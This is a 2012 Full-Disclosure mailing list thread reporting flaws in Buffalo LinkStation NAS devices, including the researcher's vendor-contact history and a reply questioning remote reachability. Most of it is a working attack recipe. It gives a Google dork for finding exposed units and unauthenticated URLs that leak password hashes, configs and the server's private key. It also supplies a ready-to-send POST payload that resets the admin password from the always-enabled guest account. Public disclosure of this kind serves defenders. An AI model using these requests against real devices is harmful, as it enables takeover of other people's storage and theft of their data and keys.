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Buffalo Technology LinkStation: Admin Password Reset as Guest User
From: Hurgel Bumpf <l0rd_lunatic () yahoo com>
Date: Wed, 5 Dec 2012 12:30:27 +0000 (GMT)
Release Date. 5-Dec-2012
Last Update. -
Vendor Notification Date. -
Product. Linkstation & Others
Platform. Buffalo Technology
Affected versions. Including Actual Version
Severity Rating. High
Impact. Admin Password Reset
Attack Vector. From remote
Solution Status. Don't use Buffalo
CVE reference. CVE - not assigned
Hi List,
just checked something out. please verifiy:
A guest user is always enabled and can NOT be disabled.
A guest user gets a GSSS and a GRRR Session value assigned when logging on
To Reset the admin password do the following:
1. Login with guest/guest
2. Get the Valid GSSS and GRRR from the source
3. Send a post request with the following form to the buffalo:
hiddenPageId=user_add&txtUserEditName=admin&txtUserEditOldName=admin&txtUserEditPassword1st=hacked&txtUserEditPassword2nd=hacked&txtUserEditComment=hacked&rdoUserEditQuota=off&hiddenUserEditNameOld=admin&txtHelpSearch=&gPage=user&gMode=setup&gType=undefined&gKey=undefined&gSSS=<YOUR
GUEST GSSS HERE>&gRRR=<YOUR GUEST GRRR HERE>&hiddenDummyText=dummy
Take care that the UserEditComment contains no special chars...
Thats it, Admin password reseted as Guest user.
Who needs permissions anyway.
Please let me know if this works for you, too.
Andre
----- Ursprüngliche Message -----
Von: Troy Korjuslommi <tjk () tksoft com>
An: Hurgel Bumpf <l0rd_lunatic () yahoo com>
CC: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>
Gesendet: 18:33 Samstag, 1.Dezember 2012
Betreff: Re: [Full-disclosure] Buffalo Technology LinkStation Information Disclosure And Privilege Escalation
At least in my tests (on different LinkStations), the URIs only work
from the networks where admin has been authorized, using the admin port
(typically 80). I.e. typically wired LAN only. Still a very serious
problem (exposing passwords and private key), but not an issue for
WebAccess, since it uses another port and provides a different view of
the system. I.e. the URIs do not work over the WebAccess connection at
least on the LinkStations I tested.
Can you confirm? It seems that you have the admin interface open to the
WAN. At least judging from the fact that the URIs used port 80, which is
the one for the admin interface, not for WebAccess.
Troy
Tksoft Inc.
On Fri, 2012-11-30 at 17:54 +0000, Hurgel Bumpf wrote:
Release Date. 30-Nov-2012
Last Update. -
Vendor Notification Date. 23.Dec.2011
Product. Linkstation & Others
Platform. Buffalo Technology
Affected versions. Including Actual Version
Severity Rating. Medium
Impact. Privilege escalation, Information Disclosure
Attack Vector. From remote
Solution Status. Don't use internet function aka. WebAccess
CVE reference. CVE - not yet assigned
Buffalo doesn't has a security department. They always forwarded me to sales, as they thought the will help me there
better. Never received any answer. Tried over some other companies to reach Buffalo, but they are not interested in
vulnerabilities.
I waited one year and nothing happend. So here we go...
Buffalo Linkstation Information Disclosure (Password, Certificate,..)
+ Google Dork
+--->intitle:"LinkStation - LS-WTGL" Copyright 2002-2008
(There are better ways to find them..)
[ WebAccess - Accessing shared folders via Browser. Disabled by default. Has to be enabled ]
If you find them online, a WebAccess ist enabled by 99.9%..
No authentication needed to access the files!
+ Permission Settings (read)
+---> x.x.x.x/modules/webaxs/module/files/perm.conf
+ Username & Password disclosure (htpasswd)
+---> x.x.x.x/modules/webaxs/module/files/password
+ Lighttpd Config
+---> x.x.x.x/modules/webaxs/module/files/lighttpd.conf
+ Lighttpd RSA Private & Public Key
+---> x.x.x.x/modules/webaxs/module/files/host.pem
Buffalo Linkstation Privilege Escalation (Admin Password Reset)
After you cracked the htpassword, logon with a gained (unprivileged) username and reset the admin password.
To do so just use temperdata or intercept on burp and try to change your password. Enable temper and press the button
to change your password.
In the POST request just change the User*Name fields with the name "admin". Make sure to keep the gSSS and gRRR as
they are the "session cookies".
Send the changed values and logon with the admin user again.
Example:
Post Data:
hiddenPageId[user_add]
txtUserEditName[admin] <--- Replace your username with admin here
txtUserEditOldName[admin] <--- Replace your username with admin here
txtUserEditPassword1st[reset] <-- Password of your favor
txtUserEditPassword2nd[reset] <-- Password of your favor
txtUserEditComment[]
hiddenUserEditNameOld[admin] <--- Replace your username with admin here
txtHelpSearch[]
gPage[user]
gMode[setup]
gType[undefined]
gKey[undefined]
gSSS[3ae1c32d69ff7a83594d9daa9c776ad8]
gRRR[666525125298680621]
hiddenDummyText[dummy]
Response Headers:
Date[Fri, 09 Dec 2011 16:42:13 GMT]
Server[Apache/1.3.34 (Unix)]
Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
Expires[Thu, 01 Dec 1994 16:00:00 GMT]
Pragma[no-cache]
Keep-Alive[timeout=15, max=100]
Connection[Keep-Alive]
Transfer-Encoding[chunked]
Content-Type[text/html; charset=UTF-8]
You can download a firmware Image and unzip it (zip password is all over the internet). There you will find more
"features".
It's just a very bad maintained linux. Bad filepermissions aso..
Buffalo: Your firmware is bad and you should feel bad!
André
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